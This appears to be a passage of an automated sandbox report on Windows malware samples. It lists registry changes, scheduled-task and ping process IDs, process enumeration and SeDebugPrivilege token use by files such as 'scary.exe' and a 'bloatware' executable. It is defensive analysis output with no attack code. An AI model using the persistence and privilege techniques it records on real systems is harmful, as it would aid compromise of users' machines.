\REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Internet Explorer\International\Scripts\30\IEPropFontName = "Microsoft Yi Baiti" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Internet Explorer\International\Scripts\37\IEPropFontName = "Leelawadee UI" reg.exe Key created \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\14 reg.exe Key created \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\16 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Internet Explorer\International\Scripts\16\IEFixedFontName = "Vani" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Internet Explorer\International\Scripts\38\IEFixedFontName = "MV Boli" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Internet Explorer\International\Scripts\11\IEPropFontName = "Shonar Bangla" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Internet Explorer\International\Scripts\14\IEPropFontName = "Kalinga" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Internet Explorer\International\Scripts\36\IEPropFontName = "Myanmar Text" reg.exe Key created \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\25 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Internet Explorer\International\Scripts\26\IEPropFontName = "Simsun" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Internet Explorer\International\Scripts\7\IEFixedFontName = "Times New Roman" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Internet Explorer\International\Scripts\37\IEFixedFontName = "Leelawadee UI" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Internet Explorer\International\Scripts\13\IEFixedFontName = "Shruti" reg.exe Key created \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\24 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFixedFontName = "Courier New" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Internet Explorer\International\Scripts\15\IEPropFontName = "Vijaya" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Internet Explorer\International\Scripts\18\IEPropFontName = "Kartika" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Internet Explorer\International\Scripts\29\IEPropFontName = "Gadugi" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Internet Explorer\International\Scripts\10\IEPropFontName = "Kokila" reg.exe Key created \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\13 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Internet Explorer\International\Scripts\9\IEFixedFontName = "Courier New" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Internet Explorer\International\Scripts\35\IEPropFontName = "Estrangelo Edessa" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Internet Explorer\International\Scripts\4\IEFixedFontName = "Courier New" reg.exe Key created \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\9 reg.exe Key created \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\12 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Internet Explorer\International\Scripts\17\IEFixedFontName = "Tunga" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Internet Explorer\International\Scripts\29\IEFixedFontName = "Gadugi" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Internet Explorer\International\Scripts\32\IEFixedFontName = "Times New Roman" reg.exe Key created \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\4 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Internet Explorer\International\Scripts\5\IEFixedFontName = "Courier New" reg.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{aac78cb3-0000-0000-0000-d01200000000} qbNQbLf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{aac78cb3-0000-0000-0000-d01200000000} Install.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe -
Modifies registry class 62 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{da4e3da0-d07d-11d0-bd50-00a0c911ce86}\Instance\{A799A800-A46D-11d0-A18C-00A02401DCD4} DrvInst.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\ = "DroidCam Source 2" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32\ = "C:\\Program Files (x86)\\DroidCam\\lib\\DroidCamFilter32.ax" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{860BB310-5D01-11d0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{da4e3da0-d07d-11d0-bd50-00a0c911ce86}\Instance\{A799A801-A46D-11d0-A18C-00A02401DCD4} DrvInst.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{71F96462-78F3-11d0-A18C-00A0C9118956}\ = "WDM TV Audio" DrvInst.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32\ = "C:\\Program Files (x86)\\DroidCam\\lib\\DroidCamFilter64.ax" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{DA4E3DA0-D07D-11d0-BD50-00A0C911CE86}\Instance\{A799A800-A46D-11d0-A18C-00A02401DCD4}\FriendlyName = "WDM Streaming TV Tuner Devices" DrvInst.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{DA4E3DA0-D07D-11d0-BD50-00A0C911CE86}\Instance\{19689BF6-C384-48FD-AD51-90E58C79F70B}\FriendlyName = "WDM Streaming Encoder Devices" DrvInst.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{DA4E3DA0-D07D-11d0-BD50-00A0C911CE86}\Instance\{7A5DE1D3-01A1-452C-B481-4FA2B96271E8}\FriendlyName = "WDM Streaming Multiplexer Devices" DrvInst.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000_Classes\psiphon\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\vir_24f1c8ec-2607-4230-9cfb-c7baba4af4c5\\bloatware\\3.exe\" -- \"%1\"" 3.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86} regsvr32.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{860BB310-5D01-11d0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\FilterData = 02000000000060000100000000000000307069330800000000000000010000000000000000000000307479330000000038000000480000007669647300001000800000aa00389b7100000000000000000000000000000000 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{DA4E3DA0-D07D-11d0-BD50-00A0C911CE86}\Instance\{19689BF6-C384-48FD-AD51-90E58C79F70B}\CLSID = "{19689BF6-C384-48FD-AD51-90E58C79F70B}" DrvInst.exe Key created \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11d0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\DevicePath = "droidcam:2" 1.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{DA4E3DA0-D07D-11d0-BD50-00A0C911CE86}\Instance\{A799A800-A46D-11d0-A18C-00A02401DCD4}\CLSID = "{A799A800-A46D-11d0-A18C-00A02401DCD4}" DrvInst.exe Key created \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000_Classes\psiphon\shell\open 3.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{860BB310-5D01-11d0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\CLSID = "{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{71F96460-78F3-11d0-A18C-00A0C9118956} DrvInst.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\ = "DroidCam Source 2" regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000_Classes\psiphon\URL Protocol 3.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11d0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{71F96460-78F3-11d0-A18C-00A0C9118956}\ = "WDM Analog Crossbar" DrvInst.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID regsvr32.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{860BB310-5D01-11d0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4aa8-BFA9-4B196644964C} 1.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\CLSID\{860BB310-5D01-11d0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4aa8-BFA9-4B196644964C} 1.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{DA4E3DA0-D07D-11d0-BD50-00A0C911CE86}\Instance\{A799A802-A46D-11d0-A18C-00A02401DCD4}\FriendlyName = "WDM Streaming TV Audio Devices" DrvInst.exe Set value (str) \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000_Classes\psiphon\ = "URL:psiphon" 3.exe Key created \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000_Classes\psiphon\shell 3.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{da4e3da0-d07d-11d0-bd50-00a0c911ce86}\Instance\{A799A802-A46D-11d0-A18C-00A02401DCD4} DrvInst.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{DA4E3DA0-D07D-11d0-BD50-00A0C911CE86}\Instance\{A799A801-A46D-11d0-A18C-00A02401DCD4}\FriendlyName = "WDM Streaming Crossbar Devices" DrvInst.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{DA4E3DA0-D07D-11d0-BD50-00A0C911CE86}\Instance\{7A5DE1D3-01A1-452C-B481-4FA2B96271E8}\CLSID = "{7A5DE1D3-01A1-452C-B481-4FA2B96271E8}" DrvInst.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{266EEE40-6C63-11cf-8A03-00AA006ECB65} DrvInst.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{860BB310-5D01-11d0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\FriendlyName = "DroidCam Source 2" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11d0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\FriendlyName = "DroidCam Source 2" regsvr32.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11d0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\FilterData = 02000000000060000100000000000000307069330800000000000000010000000000000000000000307479330000000038000000480000007669647300001000800000aa00389b7100000000000000000000000000000000 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11d0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\CLSID = "{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{DA4E3DA0-D07D-11d0-BD50-00A0C911CE86}\Instance\{A799A801-A46D-11d0-A18C-00A02401DCD4}\CLSID = "{A799A801-A46D-11d0-A18C-00A02401DCD4}" DrvInst.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{da4e3da0-d07d-11d0-bd50-00a0c911ce86}\Instance\{19689BF6-C384-48FD-AD51-90E58C79F70B} DrvInst.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{da4e3da0-d07d-11d0-bd50-00a0c911ce86}\Instance\{7A5DE1D3-01A1-452C-B481-4FA2B96271E8} DrvInst.exe Key created \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000_Classes\psiphon 3.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{860BB310-5D01-11d0-BD3B-00A0C911CE86}\Instance regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32 regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{71F96462-78F3-11d0-A18C-00A0C9118956} DrvInst.exe Key created \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000_Classes\psiphon\shell\open\command 3.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32\ThreadingModel = "Both" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{DA4E3DA0-D07D-11d0-BD50-00A0C911CE86}\Instance\{A799A802-A46D-11d0-A18C-00A02401DCD4}\CLSID = "{A799A802-A46D-11d0-A18C-00A02401DCD4}" DrvInst.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{266EEE40-6C63-11cf-8A03-00AA006ECB65}\ = "WDM TV Tuner" DrvInst.exe Key created \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11d0-BD3B-00A0C911CE86}\Instance regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{860BB310-5D01-11d0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\DevicePath = "droidcam:2" 1.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32\ThreadingModel = "Both" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86} regsvr32.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 33 IoCs
pid Process 2328 PING.EXE 3132 PING.EXE 3416 PING.EXE 2096 PING.EXE 7104 PING.EXE 4572 PING.EXE 3596 PING.EXE 7096 PING.EXE 6344 PING.EXE 5488 PING.EXE 3976 PING.EXE 652 PING.EXE 2852 PING.EXE 5964 PING.EXE 3448 PING.EXE 6256 PING.EXE 3268 PING.EXE 1504 PING.EXE 5428 PING.EXE 2164 PING.EXE 6436 PING.EXE 2976 PING.EXE 2080 PING.EXE 6296 PING.EXE 6124 PING.EXE 6304 PING.EXE 6312 PING.EXE 4572 PING.EXE 3624 PING.EXE 2584 PING.EXE 6260 PING.EXE 6696 PING.EXE 6328 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 38 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6104 schtasks.exe 7040 schtasks.exe 6168 schtasks.exe 2484 schtasks.exe 6236 schtasks.exe 3616 schtasks.exe 6252 schtasks.exe 5828 schtasks.exe 4708 schtasks.exe 2152 schtasks.exe 860 schtasks.exe 5152 schtasks.exe 3964 schtasks.exe 404 schtasks.exe 5244 schtasks.exe 3624 schtasks.exe 5128 schtasks.exe 1296 schtasks.exe 3392 schtasks.exe 956 schtasks.exe 2224 schtasks.exe 6468 schtasks.exe 2956 schtasks.exe 5440 schtasks.exe 6184 schtasks.exe 4028 schtasks.exe 6404 schtasks.exe 6808 schtasks.exe 2092 schtasks.exe 5016 schtasks.exe 6448 schtasks.exe 6548 schtasks.exe 3416 schtasks.exe 6940 schtasks.exe 6488 schtasks.exe 6904 schtasks.exe 4652 schtasks.exe 5064 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2620 tasklist.exe 2620 tasklist.exe 3988 msedge.exe 3988 msedge.exe 3368 msedge.exe 3368 msedge.exe 5688 msedge.exe 5688 msedge.exe 5352 msedge.exe 5352 msedge.exe 5540 identity_helper.exe 5540 identity_helper.exe 472 WinaeroTweaker-1.40.0.0-setup.tmp 472 WinaeroTweaker-1.40.0.0-setup.tmp 5744 powershell.exe 5744 powershell.exe 5744 powershell.exe 5744 powershell.exe 5744 powershell.exe 5744 powershell.exe 5744 powershell.exe 5744 powershell.exe 5744 powershell.exe 6924 powershell.exe 6924 powershell.exe 6924 powershell.exe 1900 powershell.exe 1900 powershell.exe 1900 powershell.exe 1000 powershell.exe 1000 powershell.exe 1000 powershell.exe 6056 powershell.exe 6056 powershell.exe 6056 powershell.exe 7108 powershell.exe 7108 powershell.exe 7108 powershell.exe 1548 powershell.exe 1548 powershell.exe 1548 powershell.exe 4056 powershell.EXE 4056 powershell.EXE 4056 powershell.EXE 5820 powershell.exe 5820 powershell.exe 5820 powershell.exe 6036 qbNQbLf.exe 6036 qbNQbLf.exe 6036 qbNQbLf.exe 6036 qbNQbLf.exe 6036 qbNQbLf.exe 6036 qbNQbLf.exe 6036 qbNQbLf.exe 6036 qbNQbLf.exe 6036 qbNQbLf.exe 6036 qbNQbLf.exe 6036 qbNQbLf.exe 6036 qbNQbLf.exe 6036 qbNQbLf.exe 6036 qbNQbLf.exe 6036 qbNQbLf.exe 6036 qbNQbLf.exe 6036 qbNQbLf.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 5784 ac3.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
pid Process 3368 msedge.exe 3368 msedge.exe 3368 msedge.exe 3368 msedge.exe 3368 msedge.exe 3368 msedge.exe 3368 msedge.exe 3368 msedge.exe 3368 msedge.exe 3368 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2620 tasklist.exe Token: SeDebugPrivilege 3828 taskkill.exe Token: SeDebugPrivilege 4036 Rover.exe Token: SeDebugPrivilege 6036 taskkill.exe Token: SeDebugPrivilege 1480 taskkill.exe Token: SeDebugPrivilege 6596 taskkill.exe Token: SeDebugPrivilege 6576 scary.exe Token: SeDebugPrivilege 6864 Romilyaa.exe Token: SeDebugPrivilege 5744 powershell.exe Token: SeDebugPrivilege 3532 Romilyaa.exe Token: SeDebugPrivilege 6832 Romilyaa.exe Token: SeDebugPrivilege 6128 msbuild.exe Token: SeDebugPrivilege 6924 powershell.exe Token: 33 7120 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 7120 AUDIODG.EXE Token: SeDebugPrivilege 1900 powershell.exe Token: SeDebugPrivilege 1000 powershell.exe Token: SeIncreaseQuotaPrivilege 5616 WMIC.exe Token: SeSecurityPrivilege 5616 WMIC.exe Token: 